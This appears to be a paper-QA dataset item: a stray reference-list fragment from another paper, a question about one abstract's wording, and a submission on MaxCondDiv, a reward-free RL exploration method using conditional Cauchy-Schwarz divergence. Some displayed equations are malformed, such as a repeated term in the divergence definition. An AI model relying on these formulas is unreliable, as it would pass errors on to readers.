Translation: Evaluation Campaign*, Lake Tahoe, California, December 4-5 2014. URL https://aclanthology.org/2014.lwslt-evaluation.0. Tanya Goyal, Jiacheng Xu, Junyi Jessy Li, and Greg Durrett. Training dynamics for text summarization models. In *Findings of the Association for Computational Linguistics: ACL 2022*, pp. 2061–2073, Dublin, Ireland, May 2022. Association for Computational Linguistics. doi: 10.18653/v1/2022.findings-acl.163. URL https://aclanthology.org/2022.findings-acl.163. Roger Grosse, Juhan Bae, Cem Anil, Nelson Elhage, Alex Tamkin, Amirhossein Tajdini, Benoit Steiner, Dustin Li, Esin Durmus, Ethan Perez, Evan Hubinger, Kamil Łukośiutė, Karina Nguyen,
pHaX00wxFy
What is meant by the idea, repeated many times in the text and summarized in the abstract: “the divergence between the agent’s estimation of the transition probability between the next state given current state-action pairs … in two adjacent trajectory fractions”?
REWARD-FREE EXPLORATION BY CONDITIONAL DIVERGENCE MAXIMIZATION Anonymous authors Paper under double-blind review ABSTRACT We propose maximum conditional divergence (MaxCondDiv), a new curiosity-driven exploration strategy that encourages the agent to learn in the absence of extrinsic rewards, effectively separating exploration from exploitation. Our central idea is to define curiosity as the divergence between the agent’s estimation of the transition probability between the next state given current state-action pairs (i.e., \( P(s_{t+1} | s_t, a_t) \)) in two adjacent trajectory fractions. Distinct to other recent intrinsically motivated exploration approaches that usually incur complex models in their learning procedures, our exploration is model-free and explicitly estimates this divergence from multivariate continuous observations, thanks to the favorable properties of the Cauchy-Schwarz divergence. Therefore, MaxCondDiv is less computationally expensive and reduces internal model selection bias. We establish a connection between the MaxCondDiv and the famed maximum entropy (MaxEnt) exploration, and observe that our MaxCondDiv achieves wider exploration range and faster convergence. Our exploration also encourages the agent to acquire intricate skills in a fully reward-free environment. 1 INTRODUCTION Over the past few years, Reinforcement Learning (RL) has achieved remarkable success in addressing challenges in fields like robotics (Mnih et al., 2015) and games (Silver et al., 2016). Nonetheless, RL’s practical applications in real-world scenarios are still restricted due to the high variability and lack of user control on the availability of dense rewards, which are critical to the timeliness and success of RL. To counteract this shortcoming, intrinsically motivated exploration (Amin et al., 2021) has been put forth to encourage the agent to explore unknown states in the absence of extrinsic rewards, by offering an internal motivation, such as diversity (Eysenbach et al., 2019), novelty (Ostrovski et al., 2017; Tao et al., 2020), curiosity (Pathak et al., 2017; Burda et al., 2019). Existing intrinsically motivated exploration approaches can be roughly divided into two categories with distinct goals (Amin et al., 2021): the space coverage approaches encourage an agent to visit more unexplored states or state-action pairs in a shorter amount of time; whereas the curiosity-driven approaches seek to explore areas where the agent’s prediction on next state given current state-action pairs (i.e., \( P(s_{t+1} | s_t, a_t) \)) has high uncertainty. Maximum entropy (MaxEnt) principle has emerged as a prominent technique in the first category. One way to achieve MaxEnt is by minimizing the KL divergence between a uniform distribution and a target distribution. This is because a uniform distribution can guarantee full coverage of the space, which also displays maximum entropy. Recently, (Hazan et al., 2019) introduced the concept of maximum state entropy exploration (MSEE) in a broader spectrum of RL environments. Subsequently, multiple approaches have been proposed to enhance it, such as (Zhang et al., 2021; Seo et al., 2021; Yuan et al., 2022; Nedergaard & Cook, 2022; Yarats et al., 2021; Tiapkin et al., 2023), just to name a few. However, the utilization of multiple policies in these MaxEnt-based methods and the objective of uniform distribution over state space may cause the agent to spend a considerable amount of time near the starting states, leading to longer training time. Conversely, curiosity-driven methods encourage exploration of unpredictable parts of the environment and prioritize the discovery of novel states beyond the initial ones. Usually, the dynamic of the environment is characterized by the transition probability of next state given current state-action pairs, i.e., \( P(s_{t+1} | s_t, a_t) \). Hence, most approaches in this category use an auxiliary predictive model... \( P_{\theta}(s_{t+1}|s_t, a_t) \) with parameters \( \theta \), such as linear regression (Schmidhuber [1991]), convolution neural networks (Pathak et al. [2017]) and fully-connected neural networks (Stadie et al. [2015], Yu et al. [2020], Pathak et al. [2017]), to model the transition probability. Once the model is trained, intrinsic rewards can be defined with either the prediction error of the next state \( s_{t+1} \) or the information gain (Lopes & Mengue [2022]), which can be approximated by the difference between the estimate of the transition probability before and after new triple samples \( \{s_{t+1}, s_t, a_t\} \) are included. The above-mentioned curiosity-driven techniques are model-based in the sense that they never explicitly estimate the true divergence of transition probability \( P(s_{t+1}|s_t, a_t) \) from observations \( \{s_{t+1}, s_t, a_t\}_{t=1}^{\infty} \) in the trajectory. Rather, they model it implicitly with an internal parametric auxiliary model \( P_{\theta}(s_{t+1}|s_t, a_t) \) for the ease of estimation. Hence, the exploration depends heavily on the predictive performance of the auxiliary models; and it is also hard for practitioners to decide which models to choose. If the model is well trained such that it learns precisely the conditional distribution \( P(s_{t+1}|s_t, a_t) \), the RL agent may encounter vanishing intrinsic rewards. On the contrary, intrinsic rewards explode. Besides, the inclusion of auxiliary models introduces additional hyperparameters and parameters, making it challenging to maintain a balance between the model and the RL agent. In this paper, we develop Maximum Conditional Divergence (MaxCondDiv), a new curiosity-driven exploration approach for exploration RL that does not rely on external rewards or parameterized models for prediction. To this end, akin to the MaxEnt principle, it leverages an information-theoretic measure to explicitly model and estimate the divergence of \( P(s_{t+1}|s_t, a_t) \) in two adjacent trajectory fractions (i.e., \( \max D(P_c(s_{t+1}|s_t, a_t); P_f(s_{t+1}|s_t, a_t)) \), where \( c \) stands for “current” and \( f \) stands for “former”) only based on observation triplets \( \{s_{t+1}, s_t, a_t\} \), in a model-free manner. Despite the simplicity of this idea, a precise estimation of the divergence between two conditional distributions is a non-trivial task, especially when the estimator is required to operate in a multivariate continuous space. To address this issue, we estimate \( D(P_c(s_{t+1}|s_t, a_t); P_f(s_{t+1}|s_t, a_t)) \) by introducing the notion of the Cauchy-Schwarz (CS) divergence (Príncipe et al. [2000], Yu et al. [2023]), which significantly reduces the difficulty of estimation and enjoys several desirable properties than conventional Kullback–Leibler (KL) divergence and maximum mean discrepancy (MMD) (Gretton et al. [2012]). To summarize, we make the following key contributions: • By explicitly modeling the conditional distribution \( P(s_{t+1}|s_t, a_t) \) without training an auxiliary model, we propose MaxCondDiv as a new reward-free exploration strategy applicable to multivariate observations, which encourages the agent to explore divergent transition probability and leads to high information gain. • Distinct to \( f \)-divergence such as KL divergence and integral probability metric such as MMD, the use of CS divergence simplifies the estimation and avoids unstable training. • We also establish the connection between MaxCondDiv with respect to MaxEnt. • Using MaxCondDiv, our agent can acquire intricate skills such as jumping and flipping in a fully reward-free environment. Using the visited states as a metric, our method outperforms other state-of-the-art reward-free exploration methods in three Mujoco environments. 2 BACKGROUND KNOWLEDGE AND RELATED WORKS 2.1 Rényi’s \( \alpha \)-Entropy and Cauchy-Schwarz Divergence In information theory, a natural extension of the well-known Shannon’s entropy is Rényi’s \( \alpha \)-entropy (Rényi [1961]). For a random variable \( x \) with probability density function (PDF) \( p(x) \) in a finite set \( X \), the \( \alpha \)-entropy \( H_\alpha(x) \) is defined as: \[ H_\alpha(x) = \frac{1}{1 - \alpha} \log \int_X p^\alpha(x) dx. \] Similarly, for two random variables \( x \) and \( y \) with joint PDF \( p(x, y) \), the joint entropy is given by: \[ H_\alpha(x, y) = \frac{1}{1 - \alpha} \log \int_Y \int_X p^\alpha(x, y) dxdy. \] Thus, the $\alpha$-order mutual information\footnote{There is no generally accepted definition on $\alpha$-order mutual information (Verdú, 2015). We took the one (Cachin, 1997) that is inspired by the strong chain rule of Shannon entropy, i.e., $H(x, y) = H(x) + H(y|x)$.} can be expressed as (Cachin, 1997; Teixeira et al., 2012): $$I_\alpha(x, y) = H_\alpha(x) + H_\alpha(y) - H_\alpha(x, y). \quad (3)$$ Likewise, extensions for the relative entropy also exist; a modified version of Rényi’s $\alpha$-relative entropy (or divergence) between PDFs $p$ and $q$ is given by (Lutwak et al., 2005): $$D_\alpha(p; q) = \log \left( \frac{\int q^{\alpha-1} p}{\int p^\alpha} \right)^{\frac{1}{1-\alpha}}. \quad (4)$$ The limiting case of (1) and (4) for $\alpha \to 1$ are Shannon’s entropy and KL divergence, respectively. It turns out that for the case of $\alpha = 2$, the above quantities can be expressed as functions of inner products between PDFs, which makes them easy to estimate in reproducing kernel Hilbert spaces (RKHS) (Principe, 2010). In particular, the quadratic entropy and divergence are given by: $$H_2(x) = -\log \int_X p^2(x) dx, \quad \text{and} \quad D_{CS}(p; q) = -\frac{1}{2} \log \left( \frac{\int pq}{\int p^2} \right)^2. \quad (5)$$ Eq. (5) is also called the Cauchy-Schwarz (CS) divergence as it can be obtained by applying the CS inequality associated with $p(x)$ and $q(x)$: $$\left| \int p(x)q(x) dx \right|^2 \leq \int |p(x)|^2 dx \int |q(x)|^2 dx. \quad (6)$$ The CS inequality also holds for two conditional distributions $p(y|x)$ and $q(y|x)$ (Yu et al., 2023), the resulting conditional CS divergence can be expressed naturally as: $$D_{CS}(p(y|x); q(y|x)) = -2 \log \left( \int_X \int_Y p(y|x)q(y|x) dx dy \right) + \log \left( \int_X \int_Y p^2(y|x) dx dy \right) + \log \left( \int_X \int_Y q^2(y|x) dx dy \right)$$ $$= -2 \log \left( \int_X \int_Y \frac{p(x,y)}{p(x)q(x)} dx dy \right) + \log \left( \int_X \int_Y \frac{p^2(x,y)}{p^2(x)} dx dy \right) + \log \left( \int_X \int_Y \frac{q^2(x,y)}{q^2(x)} dx dy \right). \quad (7)$$ ### 2.2 INTRINSICALLY-MOTIVATED EXPLORATION RL The existing intrinsically motivated exploration approaches can be broadly categorized into two types: the space coverage and the curiosity-driven approaches. Approaches rooted in the MaxEnt principle for achieving space coverage have gained popularity recently due to their strong mathematical interpretability and performance. For example, maximum state entropy exploration (MSEE) by (Hazan et al., 2019) guarantees uniform coverage of the state space. It offers a proof of policy improvement when utilizing the APPROXPLAN/DENSITYEST oracle. Later, MaxRényi (Zhang et al., 2021) replaced the Shannon entropy with Rényi entropy, and maximizes the entropy in the joint space of action and state. RE3 (Seo et al., 2021) incorporates neural encoders, enabling their application in video-oriented environments like Atari. RISE (Yuan et al., 2022) integrates both RE3 and MaxRényi, leveraging them to accelerate the learning process. In (Nedergaard & Cook, 2022) and (Yarats et al., 2021), $k$-means and prototypical representations are introduced to enhance the quality of latent vectors. (Tiapkin et al., 2023) studies MSEE to learn a policy leading to $\epsilon$-optimal maximum and reduces the sample complexity. The other type, curiosity-driven approaches, have their roots traced back to the 70’s when the concept of “observer’s information” and “interestingness” were introduced (Pfaffelhuber, 1972; Lenat, 1976). Recent popular prediction error-based approaches, largely driven by advancements in deep neural networks (DNNs), fall under this category. For instance, ICM (Pathak et al., 2017) utilizes CNN as the auxiliary model to predict the next image, whereas GIRL (Yu et al., 2020) implements variational autoencoder (VAE) (Kingma & Welling, 2014) to model the transitions in environments. Similarly, (Shyam et al., 2019) aims to maximize the Jensen-Shannon divergence of fully-connected neural network outputs. In contrast to these methods, we pursue a model-free approach. Our method shares the closest resemblance with the model-free curiosity-driven approach introduced by (Storck et al., 1995), which estimates the transition probability directly from observations. However, this method can only be used in tabular discrete environments, as it calculates the transition probability by counting. In contrast, our method is applicable to both discrete and continuous environments and is compatible with arbitrary RL techniques, thanks to the use of CS divergence. 3 Maximum Conditional Divergence (MaxCondDiv) Exploration The intrinsically-Motivated exploration RL problem can be defined as policy search in an infinite-horizon Markov decision process (MDP) defined by a 6-tuple \((S, A, p_s, r^E, r^I, \gamma)\), where \(S\) is the set of all possible states, \(A\) is the set of all possible actions. \(p_s(s_{t+1}|s_t, a_t)\) is the transition probability density of the next state \(s_{t+1} \in S\) given the current state \(s_t \in S\) and action \(a_t \in A\). The environment omits extrinsic rewards given by the extrinsic reward function \(r^E(s_t, a_t)\). Meanwhile, the intrinsic reward function \(r^I(\rho_{t-})\) determines the intrinsic rewards based on historical data \(\rho_{t-}\) collected before time step \(t\). \(\gamma \in [0, 1)\) is a discount factor. The optimal policy aims to learn a policy \(\pi(a_t|s_t): S \mapsto A\) by maximizing extrinsic and intrinsic rewards: \[ \pi^* = \arg\max_\pi \mathbb{E}_{\rho \sim \pi} \left( \sum_{t=0}^{T-1} \gamma^t [r^E(s_t, a_t) + \beta r^I(\rho_{t-})] \right), \] where \(\beta\) is a hyperparameter that determines the relative importance of intrinsic and extrinsic reward, and \(\rho = \{s_{t+1}, s_t, a_t\}_{t=0}^{T-1}\) is the data collection by executing policy \(\pi\). We specifically consider the case of reward-free cases, where the extrinsic reward \(r^E(s_t, a_t)\) is consistently zero. Our method aims to design an intrinsic reward function \(r^I(\rho_{t-})\) for exploring the functional space of transitions \(p_s(s_{t+1}|s_t, a_t)\), without relying on any extrinsic reward \(r^E(s_t, a_t)\). 3.1 Conditional Cauchy-Schwarz Divergence (CCSD) Reward Function Our focus is on enabling the agent to acquire novel transitions in contrast to recent visited samples. To specify a transition sample, we require a triplet sample consisting of the next state \(s_{t+1}\), the current state \(s_t\), and the action \(a_t\). Hence, a complete trajectory \(T_E = \{(s_2, s_1, a_1), (s_3, s_2, a_2), \ldots, (s_T, s_{T-1}, a_{T-1}), \ldots\}\), \(E\) for “entire”, is defined to be the sequence of triplet samples, as illustrated in Fig. 1. Meanwhile, we utilize a first-in-first-out replay buffer (sliding window) to locally store transition samples. We refer to this subsequence of trajectory \(T_E\) as a “trajectory fraction”, denoted as \(T\). The trajectory fraction \(T\) contains data for a maximum of \(2\tau\) previous time steps. Then we define \(P_f(s_{t+1}|s_t, a_t) = P(s_{t+1}, (s_t, a_t)) \sim T_{1:\tau}(s_{t+1}|s_t, a_t)\), \(f\) for “former”, as the transition probability \(P(s_{t+1}|s_t, a_t)\) for triplets that are sampled from \(T_{1:\tau}\) (i.e., 1-st to \(\tau\)-th elements of \(T\)). Similarly, \(P_c(s_{t+1}|s_t, a_t) = P(s_{t+1}, (s_t, a_t)) \sim T_{\tau+1:2\tau}(s_{t+1}|s_t, a_t)\), \(c\) for “current”, be the transition probability \(P(s_{t+1}|s_t, a_t)\) for triplets that are sampled from \(T_{\tau+1:2\tau}\). Our framework estimates an intrinsic reward defined as the divergence between \(P_f(s_{t+1}|s_t, a_t)\) and \(P_c(s_{t+1}|s_t, a_t)\), and learns a policy by maximizing this conditional divergence (MaxCondDiv). More formally, our optimal policy aims to maximize the divergence between “former” and “current” transitions in the trajectory fraction \(T\): \[ \pi^*_{\text{MaxCondDiv}} = \arg\max_\pi \mathbb{E}_{\rho \sim \pi} \left( \sum_{T \in [T_E]} D(P_c(s_{t+1}|s_t, a_t); P_f(s_{t+1}|s_t, a_t)) \right). \] Figure 1: The structure of our replay buffer. We choose the length of \( T \) to be \( 2\tau \) and divide it equally into "current" and "former" parts. The split point is arbitrary, and overlapping fractions are also possible. If we designate the \( T_{1:2\tau-1} \) as "former" and the \( T_{1:2\tau} \) samples as "current", our approach is consistent with that of (Storck et al., 1995). 3.2 Why Conditional Cauchy-Schwarz Divergence (CCSD) for MaxCondDiv? In principle, any divergence could be used in the context of MaxCondDiv. We underscore the rationale for choosing CS divergence, rather than the popular KL divergence and MMD. For KL divergence \[ D_{KL}(p; q) = \int p \log \left( \frac{p}{q} \right), \] its conditional extension follows a decomposition rule (Cover, 1999): \[ D_{KL}(\mathbb{P}_c(s_{t+1}|s_t, a_t); \mathbb{P}_f(s_{t+1}|s_t, a_t)) = D_{KL}(\mathbb{P}_c(s_{t+1}, s_t, a_t); \mathbb{P}_f(s_{t+1}, s_t, a_t)) \\ - D_{KL}(\mathbb{P}_c(s_t, a_t); \mathbb{P}_f(s_t, a_t)), \] in which both terms are usually evaluated by \( k \)-NN estimator (Wang et al., 2009). However, the term \( \log \left( \frac{p}{q} \right) \) will explode when \( q \to 0 \), a scenario commonly encountered in our RL experiments. This instability can disrupt the learning process for RL agents. Further empirical details regarding MaxCondDiv’s use of KL divergence can be found in both Section 4.3 and the Appendix C.2. Fortunately, CS divergence does not have this issue: it is much more stable and never explodes (see also our discussions in Appendix D.1). Theoretically, CS divergence is no greater than KL divergence in Gaussian distributed data. Therefore, it provides a viable alternative objective when KL divergence is hard to be applied in practice. Proposition 1. For two arbitrary d-variate Gaussian distributions \( p \sim \mathcal{N}(\mu_1, \Sigma_1) \) and \( q \sim \mathcal{N}(\mu_2, \Sigma_2) \), we have: \[ D_{CS}(p; q) \leq \min \{ D_{KL}(p; q), D_{KL}(q; p) \}. \] All Proofs can be found in Appendix A. Moreover, compared with the \( k \)-NN estimator, our empirical estimator of CS divergence is differentiable, which makes it promising for potential applications in deep multi-modal learning, where the RL module may play a critical role. MMD embeds probability functions in a reproducing kernel Hilbert space (RKHS). If we take the conditional MMD definition in (Ren et al., 2016), the estimator involves matrix inverse and an extra hyper-parameter, which also makes the training highly unstable and time consuming. See the Appendix C.1 for more discussions. In this paper, we suggest conditional Cauchy-Schwarz divergence (CCSD) for MaxCondDiv: \[ D_{CS}(\mathbb{P}_f(s_{t+1}|s_t, a_t); \mathbb{P}_c(s_{t+1}|s_t, a_t)) = -2 \log \left( \int_{S_{t+1}} \int_{\{s_t, a_t\}} \frac{\mathbb{P}_f(s_{t+1}, \{s_t, a_t\})}{\mathbb{P}_f(\{s_t, a_t\})} d\{s_t, a_t\} ds_{t+1} \right) \\ + \log \left( \int_{S_{t+1}} \int_{\{s_t, a_t\}} \frac{\mathbb{P}_c^2(s_{t+1}, \{s_t, a_t\})}{\mathbb{P}_c(\{s_t, a_t\})} d\{s_t, a_t\} ds_{t+1} \right) \\ + \log \left( \int_{S_{t+1}} \int_{\{s_t, a_t\}} \frac{\mathbb{P}_c^2(s_{t+1}, \{s_t, a_t\})}{\mathbb{P}_c(\{s_t, a_t\})} d\{s_t, a_t\} ds_{t+1} \right), \] where \( S_{t+1}, \{S_t, A_t\} \) are world set of \( s_{t+1} \) and \( \{s_t, a_t\} \), respectively. ### 3.3 Practical Methods for Accurately Estimating the CCSD Intrinsic Reward **Proposition 2** (Empirical Estimator of \( D_{CS}(\mathbb{P}_f(s_{t+1}|s_t, a_t); \mathbb{P}_c(s_{t+1}|s_t, a_t)) \) (Yu et al., 2023). Given observations in the \( 2\tau \)-length trajectory fraction \( T = \{[(s_{t+1}), \{s_t, a_t\}]\}_{i=1}^{2\tau} \), dividing them into two fractions such that \( \{[(s_{t+1}), \{s_t, a_t\}]\}_{i=1}^{\tau} \) are sampled from distribution \( \mathbb{P}_f(s_{t+1}, \{s_t, a_t\}) \) and \( \{[(s_{t+1}), \{s_t, a_t\}]\}_{i=\tau+1}^{2\tau} \) are sampled from \( \mathbb{P}_c(s_{t+1}, \{s_t, a_t\}) \). Let \( K_f^i \) and \( L_f^i \) denote, respectively, the Gram matrices for the concatenated variable \( \{s_t, a_t\} \) and the variable \( s_{t+1} \) in the distribution \( \mathbb{P}_f \). That is, \((K_f^i)_{ij} = \kappa(\{s_t, a_t\}_i - \{s_t, a_t\}_j)\), \((L_f^i)_{ij} = \kappa(\{s_{t+1}\}_i - \{s_{t+1}\}_j)\) for \( i, j = 1 : \tau \), in which \( \kappa \) is a Gaussian kernel and takes the form of \( \kappa = \exp \left( -\frac{\|a\|^2}{2\sigma^2} \right) \). Similarly, let \( K_c^i \) and \( L_c^i \) denote, respectively, the Gram matrices for the variable \( \{s_t, a_t\} \) and the variable \( s_{t+1} \) in the distribution \( \mathbb{P}_c \). Meanwhile, let \( K_{fc}^i \in \mathbb{R}^{\tau \times \tau} \) (i.e., \((K_{fc}^i)_{ij} = \kappa(\{s_t, a_t\}_i - \{s_t, a_t\}_j)\), \( i = 1 : \tau \) and \( j = \tau + 1 : 2\tau \)) denote the Gram matrix for variable \( \{s_t, a_t\} \) from distribution \( \mathbb{P}_f \) to distribution \( \mathbb{P}_c \), and \( L_{fc}^i \in \mathbb{R}^{\tau \times \tau} \) the Gram matrix for variable \( s_{t+1} \) from distribution \( \mathbb{P}_f \) to distribution \( \mathbb{P}_c \). The Gram matrices \( K_{cf}^i \) and \( L_{cf}^i \) can be defined similarly. The empirical estimation of \( D_{CS}(\mathbb{P}_f(s_{t+1}|s_t, a_t); \mathbb{P}_c(s_{t+1}|s_t, a_t)) \) is given by: \[ \hat{D}_{CS}(\mathbb{P}_f(s_{t+1}|s_t, a_t); \mathbb{P}_c(s_{t+1}|s_t, a_t)) = \log \left( \sum_{j=1}^{\tau} \left( \frac{\sum_{i=1}^{\tau} K_{fi}^j L_{fi}^j}{\left( \sum_{i=1}^{\tau} K_{fi}^j \right)^2} \right) \right) + \log \left( \sum_{j=1}^{\tau} \left( \frac{\sum_{i=1}^{\tau} K_{ci}^j L_{ci}^j}{\left( \sum_{i=1}^{\tau} K_{ci}^j \right)^2} \right) \right) \\ - \log \left( \sum_{j=1}^{\tau} \left( \frac{\sum_{i=1}^{\tau} K_{fc}^j L_{fc}^j}{\left( \sum_{i=1}^{\tau} K_{fc}^j \right)^2} \right) \right) - \log \left( \sum_{j=1}^{\tau} \left( \frac{\sum_{i=1}^{\tau} K_{cf}^j L_{cf}^j}{\left( \sum_{i=1}^{\tau} K_{cf}^j \right)^2} \right) \right). \] We offer a visualization in Appendix D.2 and provide implementation in Appendix E to facilitate comprehension of the Gram matrix. The estimator exhibits low computational complexity with \( O(N^2) \). The CCSD intrinsic reward can be combined with any RL methods, e.g., Q-learning (Watkins & Dayan, 1992), PPO (Schulman et al., 2017). We summarize the training pseudo code in Algorithm 1. ### 3.4 Connection between MaxCondDiv and MaxEnt **Proposition 3.** Let \( X \) and \( Y \) be two random variable with marginal PDFs \( p_X(x) = p_X(X = x) \) and \( p_Y(y) = p_Y(Y = y) \), respectively, where \( x \in \mathcal{R} \) and \( y \in \mathcal{R} \). Let \( p_{XY}(x, y) = p_{XY}(X = x, Y = y) \) denotes the joint PDF. We have: \[ \frac{1}{2} H_2(x) + \frac{1}{2} H_2(y) - I_2(x, y) \geq D_{cs}(p_X; p_Y) \] iff: \[ \int_{r \in \mathcal{R}} p_X(X = r)p_Y(Y = r)dr \geq \int_{y \in \mathcal{R}} \int_{x \in \mathcal{R}} p_{XY}^2(x, y)dxdy \] --- 2In kernel learning, the Gram or kernel matrix is a symmetric matrix where each entry is the inner product of the corresponding data points in a reproducing kernel Hilbert space (RKHS), defined by kernel function \( \kappa \). where $H_2(\cdot)$ and $I_2(\cdot,\cdot)$ are 2nd-order Rényi entropy and mutual information, as defined in Eq.(1) and Eq.(3), respectively. We justify Proposition 3 in the Appendix A.3. For two variables $X$ and $Y$, maximizing their CS divergence $D_{cs}(p_X; p_Y)$ also maximizes a lower bound of the sum of 2nd-order Rényi entropy of $X$ and $Y$ minus their 2nd-order Rényi mutual information. It applies to our case by substituting $X$ and $Y$ with $s_{t+1} \sim P_f(\cdot|s_t, a_t)$ and $s_{t+1} \sim P_c(\cdot|s_t, a_t)$, respectively. Therefore, maximizing our CCSD is closely related to the maximum trajectory entropy exploration (Ekroot & Cover [1993], Fiechter [1994]), i.e., $\text{argmax}_\pi H_{traj}(p^{\pi}_{traj})$, where $p^{\pi}_{traj} = \pi(a_1|s_1) \prod_{t=2}^{T} P_{t-1}(s_t|s_{t-1}, a_{t-1}) / \pi_t(a_t|s_t)$, which can also be obtained by solving entropy regularized Bellman equations using entropy of the transition probabilities $H(s_{t+1}|s_t, a_t)$ as rewards (Fiechter [1994], Tiapkin et al. [2023]). Meanwhile, the last term in Eq. (15) incentivizes the independence between “former” and “current”. 4 EXPERIMENTS 4.1 A THOUGHT EXPERIMENT To highlight the contrast between MaxEnt and MaxCondDiv, let us consider a thought experiment visualized in Fig. 2, where optimal policies are realized through a retrospective step: The scenario involves a 2-D open-world environment. In each trial, the agent initiates from the central position $(100, 100)$ and undergoes a sequence of 200 time steps. At each time step, the agent’s action is to select an arbitrary direction and move one unit distance. We replicate this procedure 100 times for each exploration policy. As illustrated in Fig. 2, the random policy keeps the agent predominantly near its starting point. Conversely, the optimal MaxEnt policy distributes the agent’s trajectory evenly, covering a range that far exceeds what a random policy achieves. Our MaxCondDiv agent selects a random direction to move in the first step because the sample in the buffer is $(100, 100)$, and moving in any radial direction is equally divergent. For instance, if the agent moves to $(100, 101)$, the samples in the buffer become $[(100, 100), (100, 101)]$. To maximize the divergence, the agent needs to move to $(100, 102)$ in the next step. Deviating from this will result in smaller distances to the previously visited states. Consequently, during each trial, the agent consistently moves in one single random direction. Over 100 trials, the MaxCondDiv agent explores the world more radially, akin to a fireworks display. We also explore maximizing the divergence between joint distributions (MaxJDiv), i.e., $D_{CS}(P_f(s_{t+1}, s_t, a_t); P_c(s_{t+1}, s_t, a_t))$, an alternative to MaxCondDiv. For the joint probability $P(s_{t+1}, s_t, a_t) = P(s_{t+1}|s_t, a_t)P(s_t, a_t)$, if $P(s_t, a_t)$ is small (that is, the corresponding state-action pairs are not fully explored), the corresponding $P(s_{t+1}|s_t, a_t)$ plays a minor role in the learning objective. If $P(s_t, a_t)$ is large, the corresponding $P(s_{t+1}|s_t, a_t)$ would have higher weight. This is in contrast to our goal, in which we expect that regions with low $P(s_t, a_t)$ should be explored more during exploration. Hence, we expect the performance of MaxJDiv is outperformed by MaxCondDiv. ![Figure 2](image) **Figure 2:** The realization of the thought experiment using random, optimal MaxEnt, MaxJDiv and MaxCondDiv policies. The MaxEnt principle facilitates exploration by uniformly visiting more states, whereas our MaxCondDiv principle guides exploration by maintaining distance from previously visited states. 4.2 RESULTS ON MOUNTAINCAR AND MAZE In this section, we experiment with MountainCar and Maze, using Q-learning as the oracle, and compare it to the MaxEnt principle and random policy. For MaxEnt principle, we adopt the MSEE of (Hazan et al. [2019]). The agent is trained 100 episodes, i.e., around 50,000 steps. In Figure 3 Figure 3: Trajectories of different trained policies on Mountain Car and Maze. The flag positions are indicated by red vertical lines. Both MaxEnt and MaxCondDiv can facilitate environment exploration to achieve a defined goal. MaxEnt emphasizes uniform visits to all states, while our MaxCondDiv strategy involves maintaining distance from starting points. (top-left), we illustrate the MountainCar environment, where the most challenging state to explore is indicated by the flag. We executed trained policies, and visualize their trajectories using kernel density estimation in heatmaps. As expected, the random policy fails to reach the flag and remains close to the starting points. Although MaxEnt can reach the flag, it focuses more on states near the starting point. In contrast, MaxCondDiv reaches the flag more frequently but tends to ignore regions near visited states. In Maze, as shown in Fig. 3, the agent drives the red point to explore the maze. We record trajectories for 50,000 steps. The agent is reset to the start point every 1,000 steps. The random policy remains near the start points, while MaxEnt explores the entire state space evenly. Our MaxCondDiv also explores the entire maze, but tends to stay away from the start point. In the heatmap of MaxCondDiv, the probability at the start point is much lower than that at challenging states, such as top-right and bottom-right corner, indicating that our method has a higher probability to “reach the boundary”. 4.3 Results on Mujoco Figure 4: Trajectories of various trained policies on Mujoco. Consistent with prior findings, our MaxCondDiv approach is characterized by a deliberate maintenance of distance from visited states. Mujoco is an advanced physics simulation with continuous spaces and multiple tasks in which we select Hopper, Halfcheetah and Ant. In our experiments, observation noise is introduced by rounding state and action values to two decimal places, and the RL backbone is a PPO agent. Details of hyper-parameters are in Appendix B. The agent is trained for 1,000 episodes, i.e., 1,000,000 steps in total. The agent restarts from the initial state with uniform noise in each episode. Divergence vs Entropy. We depict the distribution of visited states within 10,000 steps using trained agents in Fig. 4. For both Hopper and Halfcheetah, we visualize the first two states, which are the z-coordinate of the front tip and the top angle for Hopper, and the x-y coordinates for Ant. In Hopper, our method outperforms others and effectively learns the necessary degrees of freedom to walk forward or backward. In HalfCheetah and Ant, MaxEnt explores a broad space, generating trajectories evenly distributed around the start point. Our MaxCondDiv diverges by concentrating on exploration far from the start point, as confirmed by the radial exploration trajectories from our thought experiment. Comparison to SOTA Exploration RL Approaches. We compare our method with random policy, curiosity-driven exploration (Pathak et al., 2017) (ICM), Exploration by Random Network Distillation (Burda et al., 2019) (RND), Rényi State Entropy Maximization (Yuan et al., 2022) (RISE), Exploration by Maximizing Rényi Entropy (MaxRényi), Maximum State Entropy Exploration (Hazan et al., 2019) (MSEE) and our MaxCondDiv using KL divergence. Similar to (Hazan et al., 2019), we evaluate the exploration performance of trained agents using the number of visited states. It is widely accepted that a large number of visited states will result in improved performance in downstream tasks because the agent can gather sufficient information (Jin et al., 2020). We execute the trained policy for 10,000 steps every 100,000 steps of training, depicting the numbers of visited states in Fig. 5. MaxCondDiv outperforms the baseline methods in terms of exploration range and training speed. Furthermore, we carry out experiments on downstream tasks which is commonly referred to as the "planning phase" within a reward-free RL framework (Jin et al., 2020). However, the results in downstream tasks are significantly influenced by the subsequent offline RL algorithms employed and are limited compared to online RL. Consequently, we have not utilized them as our primary results but have included them in Appendix C.5 for reference. Learned Skill without Using Extrinsic Rewards. We have included images depicting agent motions in Fig. 6. MaxCondDiv acquires a range of basic behaviors such as jumping forward, flipping, etc, without extrinsic rewards. Videos are shown in Appendix C.3 and attached zip file. 5 CONCLUSION We propose Maximum Conditional Divergence (MaxCondDiv), a model-free method for exploration without extrinsic rewards that estimates the difference of transition probabilities in two trajectory fractions using a conditional Cauchy-Schwarz divergence estimator. MaxCondDiv exhibits distinct exploration behaviors compared to maximum entropy principle and avoids auxiliary model selection bias observed in other curiosity-driven approaches. We evaluate MaxCondDiv in two discrete and three continuous environments, consistently achieving exploration of more states or successfully reaching challenging states. REFERENCES Susan Amin, Maziar Gomrokchi, Harsh Satija, Herke van Hoof, and Doina Precup. A survey of exploration methods in reinforcement learning. *arXiv preprint arXiv:2109.00157*, 2021. Jihye Bae, Luis Sanchez Giraldo, Pratik Chhatbar, Joseph Francis, Justin Sanchez, and Jose Principe. Stochastic kernel temporal difference for reinforcement learning. In *2011 IEEE International Workshop on Machine Learning for Signal Processing*, pp. 1–6. IEEE, 2011. Yuri Burda, Harrison Edwards, Amos Storkey, and Oleg Klimov. Exploration by random network distillation. In *International Conference on Learning Representations*, 2019. Christian Cachin. *Entropy measures and unconditional security in cryptography*. PhD thesis, ETH Zurich, 1997. Thomas M Cover. *Elements of information theory*. John Wiley & Sons, 1999. Laura Ekroot and Thomas M Cover. The entropy of markov trajectories. *IEEE Transactions on Information Theory*, 39(4):1418–1421, 1993. Tom Erez, Yuval Tassa, and Emanuel Todorov. 